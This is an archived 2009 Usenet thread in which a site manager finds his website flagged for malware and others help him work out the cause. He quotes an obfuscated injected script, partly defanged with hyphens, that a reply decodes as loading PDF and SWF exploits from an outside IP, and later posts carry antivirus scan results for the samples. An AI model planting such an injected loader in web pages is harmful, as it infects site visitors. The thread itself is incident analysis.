Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Web site compromised?

3 views
Skip to first unread message

Kompu Kid

unread,
Apr 22, 2009, 3:46:17 AM4/22/09
to
Hello All:

A website I manage seems to have a problem when I tried to access it
today with Chrome browser.

Chrome gives the following warning:


"Warning: Visiting this site may harm your computer!
The website at www.XXXX.YYY (I am not giving the actual URL) contains
elements from the site beebest.cn, which appears to host malware –
software that can hurt your computer or otherwise operate without your
consent. Just visiting a site that contains malware can infect your
computer.
For detailed information about the problems with these elements, visit
the Google Safe Browsing diagnostic page for beebest.cn.
Learn more about how to protect yourself from harmful software online.
I understand that visiting this site may harm my computer. "

How can "elements" from beebest.cn can be on this site? What "do"
elements mean in this case?

I am downloading the site and will do a text search for "beebest" .

Any other recommendations?

Thanks

Deguza


Kompu Kid

unread,
Apr 22, 2009, 4:08:21 AM4/22/09
to
On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
> Hello All:
>
> A website I manage seems to have a problem when I tried to access it
> today with Chrome browser.
>
> Chrome gives the following warning:
>
> "Warning: Visiting this site may harm your computer!
> The website atwww.XXXX.YYY(I am not giving the actual URL) contains

> elements from the site beebest.cn, which appears to host malware –
> software that can hurt your computer or otherwise operate without your
> consent. Just visiting a site that contains malware can infect your
> computer.
> For detailed information about the problems with these elements, visit
> the Google Safe Browsing diagnostic page for beebest.cn.
> Learn more about how to protect yourself from harmful software online.
>  I understand that visiting this site may harm my computer.  "
>
> How can "elements" from beebest.cn can be on this site? What "do"
> elements mean in this case?
>
> I am downloading the site and will do a text search for "beebest" .
>
> Any other recommendations?
>
> Thanks
>
> Deguza

I just had a friend try to access my website. He got the same message
except the beebest.cn was replaced by www.corpamata.cn.

What is going on?

Deguza

Martin

unread,
Apr 22, 2009, 4:28:45 AM4/22/09
to

Dunno, but if it were my site I'd be looking to sack the webmaster
because he doesn't seem to know what he's doing.

Post the frigging site and you might get a descent answer from someone
who bothers to go and look at the code.
>
> Deguza
>

Kompu Kid

unread,
Apr 22, 2009, 4:48:14 AM4/22/09
to
On Apr 22, 1:28 am, Martin <usene...@etiqa.co.uk> wrote:
> Kompu Kid wrote:
> > On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
> >> Hello All:
>
> >> A website I manage seems to have a problem when I tried to access it
> >> today with Chrome browser.
>
> >> Chrome gives the following warning:
>
> >> "Warning: Visiting this site may harm your computer!
> >> The website atwww.XXXX.YYY(Iam not giving the actual URL) contains

> >> elements from the site beebest.cn, which appears to host malware –
> >> software that can hurt your computer or otherwise operate without your
> >> consent. Just visiting a site that contains malware can infect your
> >> computer.
> >> For detailed information about the problems with these elements, visit
> >> the Google Safe Browsing diagnostic page for beebest.cn.
> >> Learn more about how to protect yourself from harmful software online.
> >>  I understand that visiting this site may harm my computer.  "
>
> >> How can "elements" from beebest.cn can be on this site? What "do"
> >> elements mean in this case?
>
> >> I am downloading the site and will do a text search for "beebest" .
>
> >> Any other recommendations?
>
> >> Thanks
>
> >> Deguza
>
> > I just had a friend try to access my website. He got the same message
> > except the beebest.cn was replaced bywww.corpamata.cn.
>
> > What is going on?
>
> Dunno, but if it were my site I'd be looking to sack the webmaster
> because he doesn't seem to know what he's doing.
>
> Post the frigging site and you might get a descent answer from someone
> who bothers to go and look at the code.
>
>
>
> > Deguza

These guys are complaining about the same thing. However, some are
finding no problems...

http://www.greenockmorton.org/forum/index.php?showtopic=26972

Deguza

1PW

unread,
Apr 22, 2009, 5:18:06 AM4/22/09
to
On 04/22/2009 12:46 AM, Kompu Kid sent:

Hello Deguza:

I too believe we should be dealing with specifics. Please reply with
your site's true and complete URL in the form of:

<hxxp://www.xxxx.yyy/>
^^

In the meantime, you may wish to see if your application software is
updated to the latest possible versions so as to have all possible
security holes plugged. If you also manage the website's OS please post
a great deal of detail on its state of revision. It wouldn't hurt to
give us the ISP so we don't have to dig for it. Do you also maintain
its hardware?

Warm regards,

Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]

John Holmes

unread,
Apr 22, 2009, 12:22:03 PM4/22/09
to
Kompu Kid "contributed" in alt.hacker:

> (I am not giving the actual URL)

Don't expect any help then.

--
<snip>

erewhon

unread,
Apr 22, 2009, 5:21:44 PM4/22/09
to
A website I manage seems to have a problem when I tried to access it
today with Chrome browser.

Does it use SQL queries. If so, likely malware was inserted via SQL
injection


Kompu Kid

unread,
Apr 22, 2009, 6:41:22 PM4/22/09
to

No, it does not use SQL queries.

I found this in one of the pages. I have not put this in there, unless
FrontPage, or the webhosting software put it in.

Or it could be the infection (I am putting "-"s in some of the key
words just in case it tries to execute on a the web...):

<s-c-ript la-ngu-age=ja-va-script><!--
do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
%2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
%3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
ii/g,""));
--></script><body>

Kompu Kid

unread,
Apr 22, 2009, 8:49:35 PM4/22/09
to

I did not want anybody getting infected, that's why I did not give it
out.

Deguza

Todd H.

unread,
Apr 23, 2009, 1:38:49 AM4/23/09
to
Kompu Kid <deg...@hotmail.com> writes:

> These guys are complaining about the same thing. However, some are
> finding no problems...
>
> http://www.greenockmorton.org/forum/index.php?showtopic=26972

PHP forums ...

I lack the time to go there and triage it, but PHP is quite a
playground, and forums even more so. Probably some sort of script
injection attack if not a complete compromise.


--
Todd H.
http://www.toddh.net/

erewhon

unread,
Apr 23, 2009, 4:03:01 AM4/23/09
to

"Kompu Kid" <deg...@hotmail.com> wrote in message
news:d22517b4-3a4e-4fcb...@v23g2000pro.googlegroups.com...

On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
> A website I manage seems to have a problem when I tried to access it
> today with Chrome browser.
>
> Does it use SQL queries. If so, likely malware was inserted via SQL
> injection

No, it does not use SQL queries.

What method do you use to upload content (ftp, and web admin page via http)?

What web server is in use?

The first is subject to password attack, the latter to application
vulnerabilities.


Gandalf Parker

unread,
Apr 23, 2009, 10:07:34 AM4/23/09
to
Kompu Kid <deg...@hotmail.com> contributed wisdom to news:f1923657-9ee8-
41ec-8ba7-b...@z23g2000prd.googlegroups.com:

> I am downloading the site and will do a text search for "beebest" .
>
> Any other recommendations?
>

Do you have any dynamic content?
Do you run banner ads that are not on your machine but are links to another
machine?
Do you include google keyword advertising?
Do you have a link to a webring at the bottom of the webpage?

Gandalf Parker

David H. Lipman

unread,
Apr 23, 2009, 4:14:57 PM4/23/09
to
From: "Kompu Kid" <deg...@hotmail.com>

Yes !

The web site was compramised.

A decode of the above brings one to; 94.247.x.y/jquery.js
Which in turn brings you to...
94.247.x.y/news/?id=2 ( pdf exploit )
94.247.x.y/news/?id=3 ( swf exploit )

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


erewhon

unread,
Apr 23, 2009, 5:03:00 PM4/23/09
to

> The web site was compramised.
>
> A decode of the above brings one to; 94.247.x.y/jquery.js
> Which in turn brings you to...
> 94.247.x.y/news/?id=2 ( pdf exploit )
> 94.247.x.y/news/?id=3 ( swf exploit )

I don't think he's interested in how the malware works, rather how it got
onto his web site in the first place. His lack of technical information is
limiting the responses to 'commmon attack vectors' - we cannot provide a
definative method by which this was done without further details of the
host, how the content is updated, the o/s, web server, and apps running on
it.....


David H. Lipman

unread,
Apr 23, 2009, 5:08:49 PM4/23/09
to
From: "erewhon" <ere...@nowhere.net>


The subject of the post sounds like a query of if it was compramised.

If the code snippet provided was off the un-named web site. We can say... Yes, it is.

The OP indicated the reason for not providing the web site was "I did not want anybody

getting infected, that's why I did not give it

out." However, it could be posted obfuscated just like he did the code-snippet.

Kompu Kid

unread,
Apr 23, 2009, 6:11:49 PM4/23/09
to

UPDATE:

* I found also a My hosting services told me that an infection on my
personal computer is probably where the injection of suspect codes
have started. He says the virus on my computer used the ftp link I
have to the web hosting site.

* In addition to the script I gave earlier, I found on some pages
another piece of code that had an "iframe" html command. The iframe
was referring to a chinese site "betwager". I am not able to write the
full code and the site. Google won't let me post it.

David H. Lipman

unread,
Apr 23, 2009, 7:03:13 PM4/23/09
to
From: "Kompu Kid" <deg...@hotmail.com>

| UPDATE:


Don't use Google !

news://nntp.aioe.org/alt.computer.security
Crosss-Posted to the other groups.

As for your hosting company, they could be wrong are just passing the blame to you.
Chances are MORE likely that you use an application on the server with vulnerabilities and
malicious actors have exploited them to add malicious code to your site.

Kompu Kid

unread,
Apr 23, 2009, 7:12:03 PM4/23/09
to
On Apr 23, 4:03 pm, "David H. Lipman" <DLipman~nosp...@Verizon.Net>
wrote:

It seems like I need to install a newsreader on my computer to use the
"news://nntp.aioe.org/alt.computer.security ".

Outlooked volunteered when I put that in my Chrome's address area, but
I do not want to use it.

Any recommendations for a news reader for the XP environment? If it
matters, I use Firefox in addition to chrome.

Deguza

Todd H.

unread,
Apr 23, 2009, 7:17:43 PM4/23/09
to
"David H. Lipman" <DLipman~nospam~@Verizon.Net> writes:

> From: "Kompu Kid" <deg...@hotmail.com>
>
>
>
> | UPDATE:
>
> | * I found also a My hosting services told me that an infection on my
> | personal computer is probably where the injection of suspect codes
> | have started. He says the virus on my computer used the ftp link I
> | have to the web hosting site.
>
> | * In addition to the script I gave earlier, I found on some pages
> | another piece of code that had an "iframe" html command. The iframe
> | was referring to a chinese site "betwager". I am not able to write the
> | full code and the site. Google won't let me post it.

> Crosss-Posted to the other groups.
>
> As for your hosting company, they could be wrong are just passing the blame to you.
> Chances are MORE likely that you use an application on the server with vulnerabilities and
> malicious actors have exploited them to add malicious code to your site.

Much agreed. PHP is so pourous that it's much more likely to be a
direct attack on your site rather than some convoluted "trojan on your
computer that modifies local html and then magically knows what FTP
client you're using, reuses its cached password for the site and loads
the modified html onto the remote site."

The target audience for such a client side sploit is so small it
wouldn't be worthwhile.

visit http://www.securityfocus.com/vulnerabilities

and for each of the following, chase down what vulns there are for it
for the version of each your site is running

Web server version (apache whatever likely)
php version on the server
what php forum script you're using / version


And see what vulns are in each for the versions you have, and that'll
wittle down the "how" in what happened perhaps.

David H. Lipman

unread,
Apr 23, 2009, 7:31:14 PM4/23/09
to
From: "Kompu Kid" <deg...@hotmail.com>


| It seems like I need to install a newsreader on my computer to use the
| "news://nntp.aioe.org/alt.computer.security ".

| Outlooked volunteered when I put that in my Chrome's address area, but
| I do not want to use it.

| Any recommendations for a news reader for the XP environment? If it
| matters, I use Firefox in addition to chrome.

| Deguza

Mozilla Thunderbird - http://www.mozillamessaging.com/en-US/thunderbird/
MicroPlanet Gravity - http://mpgravity.sourceforge.net/

©Ari®

unread,
Apr 24, 2009, 2:31:46 AM4/24/09
to
On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:

> * I found also a My hosting services told me that an infection on my
> personal computer is probably where the injection of suspect codes
> have started. He says the virus on my computer used the ftp link I
> have to the web hosting site.

LOL
--
A fireside chat not with Ari!
http://tr.im/holj
Motto: Live To Spooge It!

DGB

unread,
Apr 24, 2009, 3:22:32 AM4/24/09
to
©Ari® wrote:
> On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:
>
>> * I found also a My hosting services told me that an infection on my
>> personal computer is probably where the injection of suspect codes
>> have started. He says the virus on my computer used the ftp link I
>> have to the web hosting site.
>
> LOL

Can you/will you expand on your comment, ©Ari® ?

Thanks

Doc

unread,
Apr 24, 2009, 5:47:16 AM4/24/09
to
Kompu Kid <deg...@hotmail.com> wrote in news:da2c3ba5-46fc-4b8d-a28f-
e3de6b...@k19g2000prh.googlegroups.com:

If you're posting a message in a hacker forum with a warning that you
think the site might be compromised, then the people who look at it are
forewarned.

Not posting the URL is stupid. People who can do low-tech stuff like
telnet to the server and download the page for analysis can't do that if
they don't know where it is.

It's like telling someone you think you have an STD, but not going to the
doctor to really find out.

Doc.

--
The bigger the humbug, the better people will like it.
- Phineas Taylor Barnum.

Doc

unread,
Apr 24, 2009, 6:18:00 AM4/24/09
to
Kompu Kid <deg...@hotmail.com> wrote in
news:239c28cf-07a7-4dab...@z8g2000prd.googlegroups.com:

<snip>

> Any recommendations for a news reader for the XP environment? If it
> matters, I use Firefox in addition to chrome.

I still like X-News.

http://download.cnet.com/Xnews/3000-2164_4-10026377.html

Really should download and try the latest version, but the one I have just
works - no attempts to execute code or render pages, so very safe.

Larry Thomas

unread,
Apr 24, 2009, 11:07:05 AM4/24/09
to
Yet another name for a boy chasing insecure BoaterDave.

"DGB" <DGBi...@al.com> wrote in message news:gsrpc3$d8e$1...@aioe.org...

Can you/will you expand on your comment, ŠAriŽ ?

Thanks

Big Bad Bob

unread,
Apr 25, 2009, 1:03:29 AM4/25/09
to
Kompu Kid so witilly quipped:

> Hello All:
>
> A website I manage seems to have a problem when I tried to access it
> today with Chrome browser.
>
> Chrome gives the following warning:
>
>
> "Warning: Visiting this site may harm your computer!
> The website at www.XXXX.YYY (I am not giving the actual URL) contains
> elements from the site beebest.cn, which appears to host malware –
> software that can hurt your computer or otherwise operate without your
> consent. Just visiting a site that contains malware can infect your
> computer.

<snip>

> How can "elements" from beebest.cn can be on this site? What "do"
> elements mean in this case?

usually cross-site scripting and/or embedded objects (IFRAME, etc.).
Descriptions of what those terms mean are worth a google if you don't
already have a good understanding of why it's a problem.

John Holmes

unread,
Apr 25, 2009, 4:50:32 AM4/25/09
to
Kompu Kid "contributed" in alt.hacker:

> On Apr 22, 9:22 am, John Holmes <nospam.13i...@gmail.com> wrote:
>> Kompu Kid "contributed" in alt.hacker:
>>
>> > (I am not giving the actual URL)
>>
>> Don't expect any help then.
>>
>> --
>> <snip>
>
> I did not want anybody getting infected, that's why I did not give it
> out.
>
> Deguza

I'll second Doc.

Most of the regulars here know what they're doing. FYI, my system will
not get infected by just browsing to a compromised website.

--
<snip>


~BD~

unread,
Apr 25, 2009, 5:16:58 AM4/25/09
to
John Holmes wrote:

> I'll second Doc.
>
> Most of the regulars here know what they're doing. FYI, my system will
> not get infected by just browsing to a compromised website.
>

Hello John :)

Please will you explain how/why *your* system will not be so infected
yet other folk may be?

Might it simply be because you aren't using Microsoft Windows?

--
Dave

John Holmes

unread,
Apr 25, 2009, 7:53:47 AM4/25/09
to
~BD~ "contributed" in alt.hacker:

As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
2008 DC's running ISA server and Forefront. That setup keeps my local
network free of mal/spy-ware, viruses and other nasties. The servers are
really in use as servers, i.e. nobody touches them but me and no websites
are ever visited on them.

I hope my answer satisfied you.

--
<snip>


~BD~

unread,
Apr 25, 2009, 10:58:02 AM4/25/09
to

Thank you for your response, John

With every post, I learn more. I had never heard of 'Slackware' before,
but have now visited http://www.slackware.com/index.html and now know!

I'm well outside my comfort zone but did look here, too:-
http://www.petri.co.il/rename-windows-server-2008-domain-controllers.htm

I also note that "Vulnerabilities in Microsoft ISA Server and Forefront
Threat Management Gateway (Medium Business Edition) Could Cause Denial
of Service (961759)" Ref:
http://www.microsoft.com/technet/security/bulletin/ms09-016.mspx

With equipment as described you are obviously not a simple hobbyist like
me. I'm delighted to learn that *you* cannot be infected simply by
visiting a specific URL like millions of folk in my position. It must
give you a real sense of superiority! ;)

--
Dave

John Holmes

unread,
Apr 25, 2009, 12:38:51 PM4/25/09
to
~BD~ "contributed" in alt.hacker:

Would you be surprised that I'm aware of that and my servers have been
patched and therefore not vurnerable to those attacks?

>
> With equipment as described you are obviously not a simple hobbyist
> like me. I'm delighted to learn that *you* cannot be infected simply
> by visiting a specific URL like millions of folk in my position. It
> must give you a real sense of superiority! ;)

It doesn't. There must be thousands of guys (or even girls) around
knowing more than I do.

;-)

>
> --
> Dave
>

--
<snip>

Todd H.

unread,
Apr 25, 2009, 2:49:53 PM4/25/09
to
John Holmes <nospam...@gmail.com> writes:

> ~BD~ "contributed" in alt.hacker:
>
>> John Holmes wrote:
>>
>>> I'll second Doc.
>>>
>>> Most of the regulars here know what they're doing. FYI, my system will
>>> not get infected by just browsing to a compromised website.
>>>
>>
>> Hello John :)
>>
>> Please will you explain how/why *your* system will not be so infected
>> yet other folk may be?
>>
>> Might it simply be because you aren't using Microsoft Windows?
>>
>> --
>> Dave
>>
>
> As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
> and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
> 2008 DC's running ISA server and Forefront. That setup keeps my local
> network free of mal/spy-ware, viruses and other nasties.

As far as you know.

Proving a negative is very difficult.

erewhon

unread,
Apr 25, 2009, 6:31:57 PM4/25/09
to
>> http://www.microsoft.com/technet/security/bulletin/ms09-016.mspx
>
> Would you be surprised that I'm aware of that and my servers have been
> patched and therefore not vurnerable to those attacks?

Of course you were vulnerable. The bug existed since day 1 of the o/s
release. It's been exploitable since then. The fact you have now patched it
only shows you have closed the door after the horse has bolted.


Doc

unread,
Apr 25, 2009, 6:40:37 PM4/25/09
to
comp...@toddh.net (Todd H.) wrote in
news:84zle4zhym84y6to...@yahoo.com:

Exactly.

Hence why I pointed out using an unusual, but old, tool like telnet to
download page content. It will never execute any content in the page, and
you have to read the page content and explicitly request copies of
ancilliary pages. No danger. Relying on any sort of 'malware firewall'
leaves you open to something zero-day.

~BD~

unread,
Apr 25, 2009, 6:49:19 PM4/25/09
to
> patched and therefore not vulnerable to those attacks?

No, not at all! I'd have been surprised and concerned if you had *not*
already applied that patch. I used same simply as an example to show you
that I had investigated (just a little bit!) why you felt so very safe!

You have, of course, considered that your equipment may have been
compromised *before* you applied said patch? ;)


>
>> With equipment as described you are obviously not a simple hobbyist
>> like me. I'm delighted to learn that *you* cannot be infected simply
>> by visiting a specific URL like millions of folk in my position. It
>> must give you a real sense of superiority! ;)
>
> It doesn't.

That's good!

There must be thousands of guys (or even girls) around knowing more than
I do.

Oh yes - I'm sure there are!
(but unfortunately, many of them will be the 'bad guys'!)

Kyle T. Jones

unread,
Apr 27, 2009, 12:57:20 PM4/27/09
to
comp...@toddh.net (Todd H.), my dear, dear friend, there was this time,
oh, 4/23/2009 6:17 PM or thereabouts, when you let the following
craziness loose on Usenet:

I have often heard comments such as this about PHP - yet, aside from the
.asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
using PHP to run the back-ends? I guess what I'm asking - if you're
scripting the back end to some website, and security is a main concern,
which language would you recommend?

Cheers.

Craig A. Finseth

unread,
Apr 27, 2009, 1:24:28 PM4/27/09
to
In article <gt4o5g$aad$1...@news.eternal-september.org>,
Kyle T. Jones <seriously?@youvegottabekidding.net> wrote:
...

>I have often heard comments such as this about PHP - yet, aside from the
>.asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
>using PHP to run the back-ends? I guess what I'm asking - if you're
>scripting the back end to some website, and security is a main concern,
>which language would you recommend?

The language matters much less than the quality of the programmer. If
you have a high-quality programmer, go with the language that person
recommends.

Having been programming in many languages for over 35 years, I have
yet to see a language that can keep a programmer from doing a bad job.

Craig

©Ari®

unread,
Apr 27, 2009, 11:56:34 PM4/27/09
to
On Fri, 24 Apr 2009 11:07:05 -0400, Larry Thomas wrote:

> Yet another name for a boy chasing insecure BoaterDave.
>
> "DGB" <DGBi...@al.com> wrote in message news:gsrpc3$d8e$1...@aioe.org...

> �Ari� wrote:
>> On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:
>>
>>> * I found also a My hosting services told me that an infection on my
>>> personal computer is probably where the injection of suspect codes
>>> have started. He says the virus on my computer used the ftp link I
>>> have to the web hosting site.
>>
>> LOL
>

> Can you/will you expand on your comment, �Ari� ?
>
> Thanks

To which one of you nym-shifters?

Gandalf Parker

unread,
Apr 28, 2009, 8:45:51 AM4/28/09
to
"Kyle T. Jones" <seriously?@youvegottabekidding.net> contributed wisdom to
news:gt4o5g$aad$1...@news.eternal-september.org:

> I guess what I'm asking - if you're
> scripting the back end to some website, and security is a main concern,
> which language would you recommend?

Either use a language that is unlikely to be used by crackers,
or be an expert at the most popular languages in use,
or higher an expert at the most popular languages in use,
or pay for all your code from someone you can sue.


Gandalf Parker
--
A popular package might mean its good but it doesnt mean its secure.
In fact, quite the opposite.

©Ari®

unread,
Apr 29, 2009, 12:19:40 PM4/29/09
to
On Mon, 27 Apr 2009 11:57:20 -0500, Kyle T. Jones wrote:

> I have often heard comments such as this about PHP - yet, aside from the
> .asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
> using PHP to run the back-ends? I guess what I'm asking - if you're
> scripting the back end to some website, and security is a main concern,
> which language would you recommend?

I'd recommend that a) you get a real education in what you are doing or
b) hire someone who has one.

Problem is, you won't know who to hire so get the education.

Kyle T. Jones

unread,
Apr 29, 2009, 5:25:31 PM4/29/09
to
�Ari�, my dear, dear friend, there was this time, oh, 4/29/2009 11:19 AM
or thereabouts, when you let the following craziness loose on Usenet:
> On Mon, 27 Apr 2009 11:57:20 -0500, Kyle T. Jones wrote:
>
>> I have often heard comments such as this about PHP - yet, aside from the
>> .asp methods, isn't a LAMP or WAMP setup still pretty much ubiquitous,
>> using PHP to run the back-ends? I guess what I'm asking - if you're
>> scripting the back end to some website, and security is a main concern,
>> which language would you recommend?
>
> I'd recommend that a) you get a real education in what you are doing or
> b) hire someone who has one.
>
> Problem is, you won't know who to hire so get the education.

What would you consider a "real" education?

Cheers.

GEO

unread,
Apr 29, 2009, 11:51:14 PM4/29/09
to
On Thu, 23 Apr 2009 16:14:57 -0400, "David H. Lipman"
<DLipman~nospam~@Verizon.Net> wrote:


>| I found this in one of the pages. I have not put this in there, unless
>| FrontPage, or the webhosting software put it in.
>
>| Or it could be the infection (I am putting "-"s in some of the key
>| words just in case it tries to execute on a the web...):
>
>| <s-c-ript la-ngu-age=ja-va-script><!--
>.........etc

>Yes !
>The web site was compramised.
>A decode of the above brings one to; 94.247.x.y/jquery.js
>Which in turn brings you to...
>94.247.x.y/news/?id=2 ( pdf exploit )
>94.247.x.y/news/?id=3 ( swf exploit )

Hello,

I just received today an e-mail with an image from a compromised
system in Spain that links to a page in Florida, which in turns
redirects to a chinese web page that contains a PDF and a SWF file.
Have these two already received a name/warning/descritpion?? I am
waiting for a reply from ScanTotal.

I am trying to warn the domain owners in Spain and Florida of their
problem.

Thank you.

Geo

1PW

unread,
Apr 30, 2009, 5:39:02 AM4/30/09
to
On 04/29/2009 08:51 PM, "GEO" M...@home.here sent:

Snip, snip...

> Hello,
>
> I just received today an e-mail with an image from a compromised
> system in Spain that links to a page in Florida, which in turns

> redirects to a Chinese web page that contains a PDF and a SWF file.
> Have these two already received a name/warning/description?? I am


> waiting for a reply from ScanTotal.
>
> I am trying to warn the domain owners in Spain and Florida of their
> problem.
>
> Thank you.
>
> Geo

Hello Geo:

Although you should have originated your own separate thread, please
reply with an obfuscated but decipherable URL, and it probably will be
investigated as quickly.

HTH

Pete
--
1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]

David H. Lipman

unread,
Apr 30, 2009, 6:30:06 AM4/30/09
to
From: "GEO" <M...@home.here>

>>| <s-c-ript la-ngu-age=ja-va-script><!--
>>.........etc

| Hello,

| Thank you.

| Geo

What is "ScanTotal" ?
Do you mean Virus Total ?

GEO

unread,
Apr 30, 2009, 8:40:58 AM4/30/09
to
On Thu, 30 Apr 2009 06:30:06 -0400, "David H. Lipman"
<DLipman~nospam~@Verizon.Net> wrote:

>|... I am


>| waiting for a reply from ScanTotal.

>What is "ScanTotal" ?


>Do you mean Virus Total ?

Yes, sorry. I guess I was kind of sleepy.
It looks as if Telus -my actual ISP- is blocking my messages to
VirusTotal, I'll have to find a way around to submit them, because I
receive no messages from Telus.

Geo

GEO

unread,
Apr 30, 2009, 8:49:02 AM4/30/09
to
On Thu, 30 Apr 2009 02:39:02 -0700, 1PW <barcrnah...@nby.pbz>
wrote:

>> I just received today an e-mail with an image from a compromised
>> system in Spain that links to a page in Florida, which in turns
>> redirects to a Chinese web page that contains a PDF and a SWF file.
>> Have these two already received a name/warning/description?? I am
>> waiting for a reply from ScanTotal.

>Hello Geo:
>Although you should have originated your own separate thread, please
>reply with an obfuscated but decipherable URL, and it probably will be
>investigated as quickly.

Hi Pete,

I made a long distance call to leave them a message yesterday, as
they had already closed. The page remains there this morning at ww
millerconstruction dot com ( hidden I-frame?)


Thank you.
George

GEO

unread,
Apr 30, 2009, 10:35:51 AM4/30/09
to

After I got around Telus:


Complete scanning result of "flash.swf", processed in VirusTotal at
04/30/2009

[ scan result ]
a-squared 4.0.0.101/20090430 found nothing
AhnLab-V3 5.0.0.2/20090430 found nothing
AntiVir 7.9.0.156/20090430 found [SWF/Drop.Small.QH]
Antiy-AVL 2.0.3.1/20090430 found nothing
Authentium 5.1.2.4/20090430 found nothing
Avast 4.8.1335.0/20090429 found nothing
AVG 8.5.0.327/20090430 found nothing
BitDefender 7.2/20090430 found nothing
CAT-QuickHeal 10.00/20090430 found nothing
ClamAV 0.94.1/20090430 found nothing
Comodo 1141/20090429 found nothing
DrWeb 4.44.0.09170/20090430 found nothing
eSafe 7.0.17.0/20090427 found nothing
eTrust-Vet 31.6.6484/20090430 found nothing
F-Prot 4.4.4.56/20090429 found nothing
F-Secure 8.0.14470.0/20090430 found [Trojan-Downloader:SWF/Swif.C]
Fortinet 3.117.0.0/20090430 found nothing
GData 19/20090430 found nothing
Ikarus T3.1.1.49.0/20090430 found nothing
K7AntiVirus 7.10.719/20090429 found nothing
Kaspersky 7.0.0.125/20090430 found nothing
McAfee 5600/20090429 found nothing
McAfee+Artemis 5600/20090429 found nothing
McAfee-GW-Edition 6.7.6/20090430 found [SWF.Drop.Small.QH]
Microsoft 1.4602/20090430 found [TrojanDownloader:Win32/Swif.gen!A]
NOD32 4046/20090430 found nothing
Norman 6.01.05/20090430 found nothing
nProtect 2009.1.8.0/20090429 found nothing
Panda 10.0.0.14/20090430 found nothing
PCTools 4.4.2.0/20090430 found nothing
Prevx1 3.0/20090430 found nothing
Rising 21.27.31.00/20090430 found nothing
Sophos 4.41.0/20090430 found [Troj/SWFExp-J]
Sunbelt 3.2.1858.2/20090429 found nothing
Symantec 1.4.4.12/20090430 found [Downloader.Swif.C]
TheHacker 6.3.4.1.317/20090429 found nothing
TrendMicro 8.950.0.1092/20090430 found nothing
VBA32 3.12.10.4/20090430 found nothing
ViRobot 2009.4.30.1716/20090430 found nothing
VirusBuster 4.6.5.0/20090429 found nothing


Complete scanning result of "readme.pdf", processed in VirusTotal at
04/30/2009

[ scan result ]
a-squared 4.0.0.101/20090430 found nothing
AhnLab-V3 5.0.0.2/20090430 found nothing
AntiVir 7.9.0.156/20090430 found nothing
Antiy-AVL 2.0.3.1/20090430 found nothing
Authentium 5.1.2.4/20090430 found nothing
Avast 4.8.1335.0/20090429 found [JS:Pdfka-FF]
AVG 8.5.0.327/20090430 found nothing
BitDefender 7.2/20090430 found nothing
CAT-QuickHeal 10.00/20090430 found nothing
ClamAV 0.94.1/20090430 found nothing
Comodo 1141/20090429 found nothing
DrWeb 4.44.0.09170/20090430 found nothing
eSafe 7.0.17.0/20090427 found nothing
eTrust-Vet 31.6.6484/20090430 found nothing
F-Prot 4.4.4.56/20090429 found nothing
F-Secure 8.0.14470.0/20090430 found nothing
Fortinet 3.117.0.0/20090430 found nothing
GData 19/20090430 found [JS:Pdfka-FF ]
Ikarus T3.1.1.49.0/20090430 found nothing
K7AntiVirus 7.10.719/20090429 found nothing
Kaspersky 7.0.0.125/20090430 found nothing
McAfee 5600/20090429 found nothing
McAfee+Artemis 5600/20090429 found nothing
McAfee-GW-Edition 6.7.6/20090430 found nothing
Microsoft 1.4602/20090430 found
[Exploit:Win32/Pdfjsc.gen!A]
NOD32 4046/20090430 found nothing
Norman 6.01.05/20090430 found nothing
nProtect 2009.1.8.0/20090429 found nothing
Panda 10.0.0.14/20090430 found nothing
PCTools 4.4.2.0/20090430 found nothing
Prevx1 3.0/20090430 found nothing
Rising 21.27.31.00/20090430 found nothing
Sophos 4.41.0/20090430 found nothing
Sunbelt 3.2.1858.2/20090429 found [Exploit.PDF-JS.Gen (v)]
Symantec 1.4.4.12/20090430 found [Trojan.Pidief.D]
TheHacker 6.3.4.1.317/20090429 found nothing
TrendMicro 8.950.0.1092/20090430 found nothing
VBA32 3.12.10.4/20090430 found nothing
ViRobot 2009.4.30.1716/20090430 found nothing
VirusBuster 4.6.5.0/20090429 found nothing

.... Found nothing???

Thanks.
George


David H. Lipman

unread,
Apr 30, 2009, 5:17:35 PM4/30/09
to
From: "GEO" <M...@home.here>

| Geo


What messages ?

Are you sending samples via email ?
If yes then your email server may have anti virus software that will catch and block it
from being submitted to Virus Total (VT).

Otherwise submit the samples via... http://www.virustotal.com/
and check the box "send it over SSL"

David H. Lipman

unread,
Apr 30, 2009, 5:21:24 PM4/30/09
to
From: "GEO" <M...@home.here>

| After I got around Telus:


| Complete scanning result of "flash.swf", processed in VirusTotal at
| 04/30/2009


| AntiVir 7.9.0.156/20090430 found [SWF/Drop.Small.QH]


| F-Secure 8.0.14470.0/20090430 found [Trojan-Downloader:SWF/Swif.C]

| McAfee-GW-Edition 6.7.6/20090430 found [SWF.Drop.Small.QH]
| Microsoft 1.4602/20090430 found [TrojanDownloader:Win32/Swif.gen!A]

| Sophos 4.41.0/20090430 found [Troj/SWFExp-J]
| Symantec 1.4.4.12/20090430 found [Downloader.Swif.C]


| Complete scanning result of "readme.pdf", processed in VirusTotal at
| 04/30/2009

| Avast 4.8.1335.0/20090429 found [JS:Pdfka-FF]

| GData 19/20090430 found [JS:Pdfka-FF ]

